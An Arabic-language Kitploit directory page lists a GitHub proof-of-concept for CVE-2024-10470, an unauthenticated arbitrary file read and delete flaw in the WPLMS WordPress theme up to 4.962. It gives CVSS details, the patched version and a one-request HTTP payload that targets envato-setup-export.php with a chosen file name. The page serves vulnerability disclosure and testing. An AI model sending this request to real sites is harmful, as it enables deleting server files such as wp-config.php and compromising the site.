Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10470 — WPLMS نظام إدارة التعلم لووردبريس <= 4.962 – قراءة وحذف ملفات عشوائية بدون مصادقة | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-10470
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubrandomrobbiebf/cve-2024-10470

CVE-2024-10470

WPLMS نظام إدارة التعلم لووردبريس <= 4.962 – قراءة وحذف ملفات عشوائية بدون مصادقة

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-10470

WPLMS نظام إدارة التعلم لووردبريس <= 4.962 – قراءة وحذف ملفات عشوائية بدون مصادقة

الوصف

نظام WPLMS لإدارة التعلم لووردبريس، قالب WordPress LMS لووردبريس، عرضة لقراءة وحذف ملفات عشوائية بسبب عدم كفاية التحقق من مسار الملف وأذونات الوصول في دالتي readfile و unlink في جميع الإصدارات حتى 4.962. وهذا يسمح للمهاجمين غير المصادق عليهم بحذف ملفات عشوائية على الخادم، مما قد يؤدي بسهولة إلى تنفيذ تعليمات برمجية عن بعد عند حذف الملف المناسب (مثل wp-config.php). القالب معرض للخطر حتى عندما لا يكون نشطًا.

root@kitploit:~
Affected Theme: WPLMS Learning Management System for WordPress
Theme Slug: wplms
Affected Versions: <= 4.962
CVE ID: CVE-2024-10470
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Foxyyy
Fully Patched Version: 4.963

إثبات المفهوم

root@kitploit:~
POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

download_export_zip=1&zip_file=.htaccess
تنزيل الأداة